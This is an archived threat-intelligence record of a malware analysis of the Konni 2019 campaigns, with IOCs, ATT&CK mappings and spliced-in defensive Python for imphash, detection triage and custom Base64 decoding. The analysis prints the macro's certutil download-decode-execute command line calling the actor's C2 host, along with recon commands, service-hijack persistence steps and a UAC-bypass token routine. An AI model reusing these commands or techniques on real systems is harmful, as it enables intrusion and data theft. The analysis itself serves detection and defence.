{
	"id": "97497158-831e-41be-800f-9552308d216e",
	"created_at": "2026-04-29T08:22:17.483133Z",
	"updated_at": "2026-04-29T10:42:22.317963Z",
	"deleted_at": null,
	"sha1_hash": "e82d84cd510e127ea76cb153a175d44ad12d761f",
	"title": "A Look Into Konni 2019 Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4644739,
	"plain_text": "A Look Into Konni 2019 Campaign\r\nBy Doron Karmi\r\nPublished: 2020-01-08 · Archived: 2026-04-29 07:00:53 UTC\r\n11 min read\r\nJan 4, 2020\r\nKonni is a remote administration tool observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North Korean cyber espionage group active since 2012. The group's primary victims are South Korean political organizations, as well as targets in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait and other parts of the Middle East.\r\nMap chart of APT37 main targets\r\nThe latest activities leveraging the Konni malware family potentially target political organizations and politically motivated victims in Russia and South Korea. During my research, I observed 3 distinct campaigns throughout 2019, from January to late September.\r\nThe Konni infection chain consists of multiple stages and relies on living-off-the-land binaries throughout: certutil.exe to download additional files and decode their content, and sc.exe and reg.exe for persistence. These campaigns share similar C2 infrastructure for delivery and a specific free FTP service used to exfiltrate the stolen data from the affected targets. Additionally, the macro-armed lure documents used to deliver and install the Konni payloads have similarities across all 3 campaigns.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 1 of 24\n\nKonni is a modular malware that collects reconnaissance data on the target machine prior to sending further modules to the victim. 
We were unable to find additional operations related to the Konni malware family that might reveal further capabilities and malware types used by the group associated with Konni activity.\r\nDuring our analysis I found overlap between the Konni infection chain and the tools and techniques used by the Syscon backdoor [1], which uses a service called COMSysApp to load its payload as a service DLL as a means of achieving persistence on the victim machine. Although similarities have been observed between Konni and Syscon, at this time we cannot say with full certainty that the same threat actor is behind both operations.\r\nCampaign Timeline\r\nExecution flow\r\nTypical Konni Execution Flow\r\nKonni Multi-Stage Operation\r\nStage 1 — Initial Execution\r\nIn mid-July 2019 I encountered an emerging campaign delivering the Konni malware.\r\nThe threat actor behind the campaign leveraged a malicious macro-armed Microsoft Word document titled “О ситуации на Корейском полуострове и перспективах диалога между США и КНДР” (About the situation on the Korean Peninsula and the prospects for a dialogue between the United States and the DPRK).\r\nUnlike the previously observed campaign, the August campaign potentially targets Russian-language speakers with an interest in the Korean geopolitical situation: the lure document used in this campaign is written in Cyrillic and contains content related to North Korean and American foreign affairs.\r\nDecoy document for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726\r\nWhen analyzing the document, we see that the internal codepage of the lure document is 949 — ANSI/OEM Korean (Unified Hangul Code). 
This indicates that the actor who created the document worked on a system with a Korean locale and keyboard layout. It is an indication, though not proof, that the author is a native Korean speaker.\r\nDocument Properties. Codepage 949 is Windows Korean (Unified Hangul Code)\r\nThe lure document contains VBA macro code with the following capabilities:\r\nChanges the font color from light grey to black, to trick the victim into enabling content.\r\nChecks whether Windows is a 32-bit or 64-bit version.\r\nConstructs and executes the command line that downloads additional files.\r\nMacro code for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726\r\nThe document contains 3 hidden text boxes. Each text box holds a hexadecimal string that the macro converts into a command, which is executed once the document is opened by the victim and macros are enabled.\r\nFull command line example: c:\\windows\\system32\\cmd.exe /q /c copy /y %windir%\\system32\\certutil.exe %temp%\\mx.exe \u0026\u0026 cd /d %temp% \u0026\u0026 mx -urlcache -split -f http://handicap.eu5[.]org/1.txt \u0026\u0026 mx -decode -f 1.txt 1.bat \u0026\u0026 del /f /q 1.txt \u0026\u0026 1.bat\r\nCertutil is a living-off-the-land command line utility that can be used to obtain certificate authority information and configure certificate services. Threat actors routinely abuse certutil to download remote files from a given URL (-urlcache -split -f fetches the URL and writes the response to a local file), and it also incorporates a built-in function (-decode) to decode Base64-encoded files.\r\ncmd.exe silently (/q turns echo off) copies certutil.exe into the temp directory and renames it to “mx.exe” in an attempt to evade detection, then downloads 1.txt from a remote resource: http://handicap.eu5[.]org. 
The text file contains a Base64-encoded string that is decoded by certutil and saved as 1.bat.\r\nThe threat actor covers its tracks by silently deleting 1.txt from the temp directory and then executes 1.bat.\r\nKonni Initial Execution\r\nStage 2 — Privilege Escalation\r\nThe batch script acts as a second-stage downloader and fetches one of two additional files, depending on the system architecture. Certutil is executed again to download a txt file and decode its content; decoding each Base64 string (32-bit or 64-bit version) results in a cabinet file, setup.cab.\r\n1.bat: downloads next stager\r\nThe content of the cabinet file is then extracted into the %temp% folder, and setup.cab is deleted from the system.\r\nsetup.cab files\r\nInstall.bat — acts as the installer that ensures persistence and executes mshlpsrvc.dll.\r\nmshlpweb.dll — acts as the loader; responsible for elevating privileges.\r\nmshlpsrvc.dll — final payload; responsible for data exfiltration.\r\nmshlpsrvc.ini — configuration file; contains the URL used by mshlpsrvc.dll.\r\nBoth dropped DLL files are unsigned and packed with the UPX packer.\r\nDLL file is unsigned \u0026 UPX strings indicate file is packed\r\nTo check the level of permissions, the threat actor uses net.exe. If the current user already has high privileges, install.bat is executed directly. Otherwise, mshlpweb.dll is executed using rundll32.exe.\r\n1.bat: Checks for user’s permission\r\nmshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. To gain higher privileges, mshlpweb.dll executes the Windows Update Standalone Installer, wusa.exe. 
This process runs as a high-integrity process by default, since it is set to auto-elevate within its manifest. Note that auto-elevation only applies when the logged-on user is a member of the local Administrators group running in Admin Approval Mode: this stage is a UAC bypass, not an exploit that grants privileges a standard user does not already hold.\r\nwusa.exe manifest, autoElevate set to true\r\nmshlpweb.dll contains an access token impersonation routine that duplicates the token of the high-integrity instance of wusa.exe and uses it to create a new cmd.exe process running under the security context of the impersonated user [2], which in turn executes the installer, install.bat.\r\nwusa.exe runs with high integrity\r\nToken Impersonation Routine\r\nmshlpweb.dll uses a set of standard Windows API calls to duplicate the token of wusa.exe and spawn a high-integrity instance of cmd.exe. Higher privileges are needed to execute the installer, install.bat. The technique used by the threat actor is a fully fileless UAC bypass named “Cavalry” that was leaked in March 2017 to WikiLeaks as part of “Vault 7”, a series of leaks on the US CIA; several actors in the wild have used the privilege escalation techniques from that leak since then [3]. This technique also bypasses UAC under the “Always notify” setting.\r\nTechnique flow:\r\nwusa.exe is executed in a hidden window using ShellExecuteExW.\r\nA handle to the access token associated with wusa.exe is opened.\r\nThe token object of wusa.exe is duplicated using DuplicateTokenEx. 
The threat actor passes TOKEN_ALL_ACCESS as the desired access, which combines all possible access rights for a token, and creates a new impersonation token.\r\nA new SID for the medium mandatory integrity level is created and applied to the duplicated token with NtSetInformationToken (TokenIntegrityLevel), lowering its integrity level.\r\nA restricted token is then created with NtFilterToken and duplicated again with DuplicateTokenEx.\r\nThe new duplicated token is passed to ImpersonateLoggedOnUser.\r\nAn elevated cmd instance is spawned using the CreateProcessWithLogonW function. The credentials passed as arguments (Username: aaa, Domain: bbb, Password: ccc) are identical to the credentials specified in the UAC bypass implementation by FuzzySecurity, UAC-TokenMagic [4]. They do not need to be valid: the call is made with the LOGON_NETCREDENTIALS_ONLY logon flag, under which the new process shares the caller's logon session and the supplied credentials are used only for outbound network access.\r\nI used James Forshaw’s excellent blog post [6], which explains in detail how to bypass UAC using the technique above.\r\nKonni 2nd stage and privilege escalation flow\r\nStage 3 — Persistence\r\nWhen the installer is executed, it first stops COMSysApp, a service that manages the configuration and tracking of Component Object Model (COM)-based components, using the sc.exe utility. It then:\r\nconfigures the COMSysApp service to autostart and sets its binpath to svchost.exe;\r\nadds COMSysApp under the “SvcHost” key as a preliminary step to its execution in the context of svchost.exe;\r\nadds the malicious DLL as the service DLL of COMSysApp;\r\nrestarts the COMSysApp service.\r\nInstall.bat: Persistence \u0026 Execution of mshlpsrvc.dll\r\nOnce the COMSysApp service is restarted the malware is loaded in memory, and the batch file is removed from the infected system. The final payload (mshlpsrvc.dll) and its configuration file (mshlpsrvc.ini) are both copied from the temp directory into the System32 directory, and the temp copies are then deleted.\r\nInstall.bat: files copied to System32 directory\r\nmshlpsrvc.dll Execution and Persistence flow\r\nStage 4 — Data Reconnaissance and Exfiltration\r\nAfter the COMSysApp service is restarted, a new instance of svchost.exe is spawned and loads the final payload, mshlpsrvc.dll. mshlpsrvc.ini is the configuration file that was delivered together with mshlpsrvc.dll in the earlier stage of the attack. It contains a Base64-encoded string using a custom key (alphabet); mshlpsrvc.dll reads and decodes the file, performs an outbound connection and downloads handicap.eu5[.]org/4.txt.\r\nThe Custom Base64 key used to decode mshlpsrvc.ini content\r\nData Reconnaissance\r\nPrior to executing any recon command to gather information from the target machine, the default codepage of the console is changed to 65001 (UTF-8):\r\ncmd /c REG ADD HKCU\\Console /v CodePage /t REG_DWORD /d 65001 /f\r\nThe following information is gathered from the affected machine and sent back to the control server:\r\nSystem info using: cmd /c systeminfo \u003e%temp%\\temp.ini\r\nList of running processes using: cmd /c tasklist \u003e%temp%\\temp.ini\r\nThe temp.ini file is then compressed into a cabinet file and saved to C:\\Windows\\TEMP (the service runs as LocalSystem, for which %temp% resolves to C:\\Windows\\TEMP): cmd /c makecab “C:\\Windows\\TEMP\\temp.ini” “C:\\Windows\\TEMP\\temp.cab”\r\nThe downloaded file, 4.txt, contains a Base64-
encoded string with the same custom key used before. After decoding, the file content appears to be the credentials for the FTP service that acts as the command \u0026 control server for this attack. We have observed similar past campaigns where free FTP services were used as the C2 for other Konni and Syscon variants, starting from October 2017 [5].\r\nFTP credentials for C2 server\r\nExfiltration\r\nThe data is exfiltrated in the following way:\r\nThe temp.cab is Base64-encoded with the same custom key used earlier.\r\nThe encoded temp.cab is written to post.txt under the directory C:\\Windows\\TEMP.\r\nThe file is uploaded to the control server using the FTP STOR command. Plain FTP is cleartext, so both the login and the upload are visible on the wire, which makes the session a good candidate for network detection.\r\nFTP Session — login to the C2 FTP server and data exfiltration\r\nData Reconnaissance and Exfiltration flow\r\n2019 Outbursts — Konni Campaigns\r\nDuring my research, I observed 3 additional outbursts in 2019: 2 similar samples observed in January 2019, and another one in September 2019.\r\n2019 Konni Outbursts\r\nMonitoring the Konni family samples and the techniques used in the various campaigns throughout the year allowed me to track the malware's evolution and the changes made by the APT, but also to find many similarities shared by every Konni campaign.\r\nHash Comparison\r\nImphash (for “import hash”) is a hash value assigned to a PE file based on its import table. The hash is calculated over the library and API function names and their order within the executable. 
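The computation just described, as an added example rather than code from the article: a small Python reimplementation of the published Imphash algorithm (the one pefile's get_imphash uses), run over constructed import tables instead of the Konni samples. It shows why import order matters and why a UPX-packed file's Imphash says nothing about the payload inside it.

```python
import hashlib

# Extensions pefile strips from the library name before hashing
_STRIP = ('.dll', '.ocx', '.sys')


def normalise(dll, func):
    '''Lower-case dll.func pair in the exact form pefile hashes.'''
    dll = dll.lower()
    for ext in _STRIP:
        if dll.endswith(ext):
            dll = dll[:-len(ext)]
            break
    if isinstance(func, int):
        # Imports by ordinal become ordN. pefile additionally maps well-known
        # ordinals (ws2_32, oleaut32) back to names; omitted here as a simplification.
        func = 'ord%d' % func
    return '%s.%s' % (dll, func.lower())


def imphash(imports):
    '''imports: (dll, function-name-or-ordinal) pairs in import-table order.'''
    joined = ','.join(normalise(d, f) for d, f in imports)
    return hashlib.md5(joined.encode('ascii')).hexdigest()


def same_build(a, b):
    return imphash(a) == imphash(b)


# Constructed import tables (illustrative, not taken from real samples).
# Two builds of the same source give the same table and therefore the same hash.
LOADER_BUILD_1 = [
    ('KERNEL32.dll', 'CreateProcessW'), ('ADVAPI32.dll', 'DuplicateTokenEx'),
    ('ADVAPI32.dll', 'ImpersonateLoggedOnUser'), ('SHELL32.dll', 'ShellExecuteExW'),
    ('ntdll.dll', 'NtFilterToken'), ('ntdll.dll', 'NtSetInformationToken'),
]
LOADER_BUILD_2 = [(d.upper(), f) for d, f in LOADER_BUILD_1]  # case differs, hash does not

# Same functions referenced in a different order: different linker output, different hash.
REORDERED = list(reversed(LOADER_BUILD_1))

# Typical import table of a UPX-packed PE: only the unpacker stub's imports are visible,
# so every binary packed with the same UPX build shares this hash regardless of payload.
UPX_STUB = [
    ('KERNEL32.DLL', 'LoadLibraryA'), ('KERNEL32.DLL', 'GetProcAddress'),
    ('KERNEL32.DLL', 'VirtualProtect'), ('KERNEL32.DLL', 'VirtualAlloc'),
    ('KERNEL32.DLL', 'VirtualFree'), ('KERNEL32.DLL', 'ExitProcess'),
]

if __name__ == '__main__':
    print('build 1 ', imphash(LOADER_BUILD_1))
    print('build 2 ', imphash(LOADER_BUILD_2), same_build(LOADER_BUILD_1, LOADER_BUILD_2))
    print('reorder ', imphash(REORDERED), same_build(LOADER_BUILD_1, REORDERED))
    print('upx stub', imphash(UPX_STUB))
```

Run it against the unpacked DLLs; on the UPX-packed droppers the hash will collapse to the stub's value and tell you nothing about the author.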
This is an efficient way of pivoting: malicious executables that share an Imphash were most likely built from the same source by the same group.\r\nThe linker builds the import table based on the order in which functions are referenced in the source, so the same Imphash value indicates that the PE import tables contain the same functions in the same order. Together with the shared infrastructure and decoding routine, this is strong evidence tying payloads from different campaigns to the same threat actor. Two caveats apply: Imphash must be computed on the unpacked payload, since on a UPX-packed file it reflects only the packer stub's imports and collides with every other binary packed the same way; and unrelated samples built from a common code template can collide too, so an Imphash match alone is a pivot, not proof.\r\nDoc Properties Comparison\r\nAll lure documents associated with Konni activities are written in Cyrillic and potentially target political organizations and politically motivated victims in Russia. Nevertheless, we found that all 3 documents' internal codepage is set to 949 — ANSI/OEM Korean (Unified Hangul Code).\r\nMacro Comparison\r\nThe lure document is armed with a VBA macro that essentially assembles the command line to be executed. The final command line composed by the macro is identical across all 3 campaigns except for the C2 URL from which the next stager is downloaded. 
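Because only the C2 URL varies between campaigns, host telemetry can be matched on the invariant parts of the chain instead: the certutil copy-and-rename and -urlcache/-decode usage from Stage 1, rundll32 loading a DLL from a temp path, the sc/reg reconfiguration of COMSysApp from Stage 3, and the recon staging and makecab from Stage 4. The Python below is an added example, not the author's tooling or anything from the campaign; the events it runs over are constructed Sysmon-style records, and the rundll32 export, the svchost -k group name and the user paths in them are assumptions.

```python
'''Process-creation triage for the Konni chain. Added example, not code from
the article or its author. EVENTS are constructed Sysmon Event ID 1 style
records, not real telemetry; the rundll32 export (#1), the svchost -k group
name and the user paths in them are assumptions.'''

BS = chr(92)  # backslash; paths are normalised to '/' so checks stay separator-agnostic
OFFICE = {'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'}
SHELLS = {'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'rundll32.exe'}


def base(path):
    return path.replace(BS, '/').rsplit('/', 1)[-1].lower()


def triage(ev):
    '''Return the names of the rules an event matches ([] when none do).'''
    hits = []
    cl = ev['cmdline'].lower().replace(BS, '/')
    img, par, orig = base(ev['image']), base(ev['parent']), ev['original'].lower()
    if par in OFFICE and img in SHELLS:
        hits.append('office-spawns-shell')
    # Stage 1: certutil copied into %temp% under another name, then used to fetch and decode.
    if 'copy' in cl and 'certutil.exe' in cl and '%temp%' in cl:
        hits.append('certutil-staged-copy')
    if orig == 'certutil.exe' and img != 'certutil.exe':
        hits.append('renamed-certutil')  # OriginalFileName (PE version info) survives the rename
    if orig == 'certutil.exe' and ('-urlcache' in cl or '-decode' in cl):
        hits.append('certutil-download-or-decode')
    # Stage 2: loader DLL executed from a temp directory through rundll32.
    if img == 'rundll32.exe' and ('%temp%' in cl or '/temp/' in cl):
        hits.append('rundll32-from-temp')
    # Stage 3: COMSysApp re-pointed at svchost.exe, ServiceDll added under its Parameters key.
    if img == 'sc.exe' and 'config' in cl and 'binpath=' in cl and 'svchost.exe' in cl:
        hits.append('sc-binpath-svchost')
    if img == 'reg.exe' and ' add ' in cl and ('servicedll' in cl or 'currentversion/svchost' in cl):
        hits.append('reg-servicedll-or-svchost-group')
    # Stage 4: recon output redirected to temp.ini, packed with makecab, console codepage switched.
    if ('systeminfo' in cl or 'tasklist' in cl) and '>' in cl and 'temp.ini' in cl:
        hits.append('recon-to-temp-ini')
    if 'makecab' in cl and 'windows/temp' in cl:
        hits.append('makecab-windows-temp')
    if 'hkcu/console' in cl and 'codepage' in cl and '65001' in cl:
        hits.append('console-codepage-65001')
    return hits


def run(events):
    '''(event index, rule name) for every hit across a batch of events.'''
    return [(i, rule) for i, ev in enumerate(events) for rule in triage(ev)]


# Constructed events following the article's chain; the last one is a benign control.
EVENTS = [
    {'image': 'C:\\Windows\\System32\\cmd.exe', 'original': 'Cmd.Exe',
     'parent': 'C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE',
     'cmdline': 'c:\\windows\\system32\\cmd.exe /q /c copy /y %windir%\\system32\\certutil.exe %temp%\\mx.exe && cd /d %temp% && mx -urlcache -split -f http://handicap.eu5[.]org/1.txt && mx -decode -f 1.txt 1.bat && del /f /q 1.txt && 1.bat'},
    {'image': 'C:\\Users\\victim\\AppData\\Local\\Temp\\mx.exe', 'original': 'CertUtil.exe',
     'parent': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'mx -urlcache -split -f http://handicap.eu5[.]org/1.txt'},
    {'image': 'C:\\Windows\\System32\\rundll32.exe', 'original': 'RUNDLL32.EXE',
     'parent': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'rundll32.exe C:\\Users\\victim\\AppData\\Local\\Temp\\mshlpweb.dll,#1'},  # export assumed
    {'image': 'C:\\Windows\\System32\\sc.exe', 'original': 'sc.exe',
     'parent': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'sc config COMSysApp start= auto binpath= %SystemRoot%\\system32\\svchost.exe -k COMSysApp'},
    {'image': 'C:\\Windows\\System32\\reg.exe', 'original': 'reg.exe',
     'parent': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\COMSysApp\\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\\System32\\mshlpsrvc.dll /f'},
    {'image': 'C:\\Windows\\System32\\cmd.exe', 'original': 'Cmd.Exe',
     'parent': 'C:\\Windows\\System32\\svchost.exe',
     'cmdline': 'cmd /c makecab C:\\Windows\\TEMP\\temp.ini C:\\Windows\\TEMP\\temp.cab'},
    {'image': 'C:\\Windows\\System32\\certutil.exe', 'original': 'CertUtil.exe',
     'parent': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'certutil -verify server.cer'},
]

if __name__ == '__main__':
    for i, rule in run(EVENTS):
        print(i, rule, base(EVENTS[i]['image']))
```

The OriginalFileName check is the one that catches the mx.exe trick: the name in the PE version resource does not change when the file is copied, so a renamed certutil still identifies itself. The benign control (certutil run from its real path for certificate verification) matches nothing.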
In our example from the July campaign the final command line is:\r\nc:\\windows\\system32\\cmd.exe /q /c copy /y %windir%\\system32\\certutil.exe %temp%\\mx.exe \u0026\u0026 cd /d %temp% \u0026\u0026 mx -urlcache -split -f http://handicap.eu5[.]org/1.txt \u0026\u0026 mx -decode -f 1.txt 1.bat \u0026\u0026 del /f /q 1.txt \u0026\u0026 1.bat\r\nBelow you can see the evolution of the macro code throughout the Konni attacks; one notable change is the switch to hidden text boxes within the document that contain the hex representation of the commands, instead of placing the commands directly in the macro, so that the command strings are no longer present in the VBA code itself.\r\nDecoding Routine\r\nThe Konni malware family uses a custom Base64 key (alphabet) to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns:\r\nTypical Konni Data Reconnaissance and Exfiltration\r\nAlso, the decoding routine is identical across all Konni samples we have analyzed, which indicates code reuse by the threat actor.\r\nKonni Decoding Routine\r\nHunting for Konni\r\nThe YARA rules below were used to find additional samples of the Konni malware known in the wild. 
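Alongside the YARA rules, the decoding routine discussed under Stage 4 and Decoding Routine calls for one more piece of analyst tooling. The Python below is an added example, not the malware's routine or the author's script: a codec for a Base64 variant that uses a custom alphabet, parameterised so the table recovered from a sample can be dropped in to decode mshlpsrvc.ini, 4.txt or post.txt. The article shows Konni's real key only as an image, so the CUSTOM alphabet and the SAMPLE_CONFIG bytes here are constructed placeholders.

```python
import base64

STANDARD = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# Constructed placeholder for the Konni key: a permutation of the standard set.
# Replace with the 64-character table recovered from the decoding routine.
CUSTOM = 'zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210/+'


def make_codec(alphabet):
    '''Return (encode, decode) for a Base64 variant that uses the given alphabet.'''
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError('alphabet must be 64 distinct characters')
    if '=' in alphabet:
        raise ValueError('this codec assumes = is reserved for padding')
    to_std = str.maketrans(alphabet, STANDARD)
    from_std = str.maketrans(STANDARD, alphabet)

    def encode(data):
        return base64.b64encode(data).decode('ascii').translate(from_std)

    def decode(text):
        # Files fetched with certutil or read from an .ini often carry line breaks
        # and may lack padding; normalise before mapping back to the standard set.
        cleaned = ''.join(text.split()).translate(to_std)
        cleaned += '=' * (-len(cleaned) % 4)
        return base64.b64decode(cleaned, validate=True)

    return encode, decode


encode_custom, decode_custom = make_codec(CUSTOM)

# Constructed stand-in for the decoded content of mshlpsrvc.ini (not the real config).
SAMPLE_CONFIG = b'url=http://example.invalid/4.txt'
SAMPLE_INI = encode_custom(SAMPLE_CONFIG)


def decode_config(blob):
    '''Decode an ini/4.txt-style blob to text; latin-1 keeps every byte 1:1.'''
    return decode_custom(blob).decode('latin-1')


def naive_decode_matches(data):
    '''Why the key is needed: a standard Base64 decoder accepts the custom encoding
    (every character is in the standard set) but returns the wrong bytes.'''
    return base64.b64decode(encode_custom(data)) == data


if __name__ == '__main__':
    print(SAMPLE_INI)
    print(decode_config(SAMPLE_INI))
    print('standard decoder recovers plaintext:', naive_decode_matches(SAMPLE_CONFIG))
```

Encoding the cabinet before upload works the same way in reverse: read post.txt, call decode_custom, and write the result out as temp.cab before expanding it.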
The rules are a combination of unique strings from the macro within the lure documents, unique strings and Windows API calls from the payload, and a unique opcode sequence taken from the decoding routine shared among all samples.\r\nYARA Rule: Lure Doc\r\nYARA Rule: Konni Payload\r\nCheck my YARA GitHub page to test the YARA rules I used to hunt for Konni samples.\r\nMITRE ATT\u0026CK Techniques\r\n(Technique IDs as they were at the time of publication; several have since been renumbered as sub-techniques.)\r\nExecution\r\nT1059-Command-Line Interface\r\nT1129-Execution through Module Load\r\nT1085-Rundll32\r\nPersistence\r\nT1031-Modify Existing Service\r\nT1050-New Service\r\nPrivilege Escalation\r\nT1134-Access Token Manipulation\r\nT1050-New Service\r\nDefense Evasion\r\nT1134-Access Token Manipulation\r\nT1088-Bypass User Account Control\r\nT1140-Deobfuscate/Decode Files or Information\r\nT1112-Modify Registry\r\nT1085-Rundll32\r\nDiscovery\r\nT1057-Process Discovery\r\nT1082-System Information Discovery\r\nExfiltration\r\nT1048-Exfiltration Over Alternative Protocol\r\nT1132-Data Encoding\r\nIOCs\r\nLure Documents\r\n8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd\r\n4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726\r\ned63e84985e1af9c4764e6b6ca513ec1c16840fb2534b86f95e31801468be67a\r\nKonni Loader\r\n6a22db7df237c085855deb48686217173dc2664f4b927ebe238d4442b68a2fd3\r\n2ab1b28bae24217e8b6dd0cd30bb7258fa34c0d7337ecfea55e4310d08aeb1e6\r\nKonni final payload\r\ne94fa697d8661d79260edf17c0a519fae4b2a64037aa79b29d6631205995fdad\r\n6256ba2b89c78877328cc70d45db980310a51545a83d1d922d64048b57d6c057\r\n52ba17b90244a46e0ef2a653452b26bcb94f0a03b999c343301fef4e3c1ec5d2\r\n7d2b1af486610a45f78a573af9a9ad00414680ff8e958cfb5437a1b140acb60c\r\nceb8093507911939a17c6c7b39475f5d4db70a9ed3b85ef34ff5e6372b20a73e\r\n8795b2756efa32d5101a8d38ea27fca9c8c7ed1d54da98f0520f72706d1c5105\r\n7f6984fa9d0bbc1bd6ab531f0a8c2f4beb15de30f2b20054d3980395d77665af\r\n290c942da70c68d28a387775fbb7e6cab6749547d278cb755b4999e0fe61a09f\r\n274e706809a1c0363f78363d0c6a7d256be5be11039de14f617265e01d550a98\r\nIP Addresses\r\n69.197.143.12\r\n185.27.134.11\r\n88.99.13.69\r\n162.253.155.226\r\nDomains\r\nclean.1apps[.]com\r\nhandicap.eu5[.]org\r\npanda2019.eu5[.]org\r\nftpupload[.]net\r\nSource: https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b"
	],
	"report_names": [
		"a-look-into-konni-2019-campaign-b45a0f321e9b"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-29T10:39:54.780383Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4",
			"created_at": "2025-08-07T02:03:25.096857Z",
			"updated_at": "2026-04-29T10:39:54.670197Z",
			"deleted_at": null,
			"main_name": "NICKEL JUNIPER",
			"aliases": [
				"Konni",
				"OSMIUM ",
				"Opal Sleet "
			],
			"source_name": "Secureworks:NICKEL JUNIPER",
			"tools": [
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b43c8747-c898-448a-88a9-76bff88e91b5",
			"created_at": "2024-02-02T02:00:04.058535Z",
			"updated_at": "2026-04-29T10:39:53.647929Z",
			"deleted_at": null,
			"main_name": "Opal Sleet",
			"aliases": [
				"OSMIUM",
				"Konni",
				"Vedalia"
			],
			"source_name": "MISPGALAXY:Opal Sleet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-29T10:39:54.776396Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-29T10:39:53.154905Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"ATK4",
				"InkySquid",
				"ScarCruft",
				"Venus 121",
				"G0067",
				"APT 37",
				"Operation Daybreak",
				"Reaper Group",
				"Ricochet Chollima",
				"APT-C-28",
				"Moldy Pisces",
				"Group 123",
				"Group123",
				"Operation Erebus",
				"Red Eyes"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1777450937,
	"ts_updated_at": 1777459342,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e82d84cd510e127ea76cb153a175d44ad12d761f.pdf",
		"text": "https://archive.orkl.eu/e82d84cd510e127ea76cb153a175d44ad12d761f.txt",
		"img": "https://archive.orkl.eu/e82d84cd510e127ea76cb153a175d44ad12d761f.jpg"
	}
}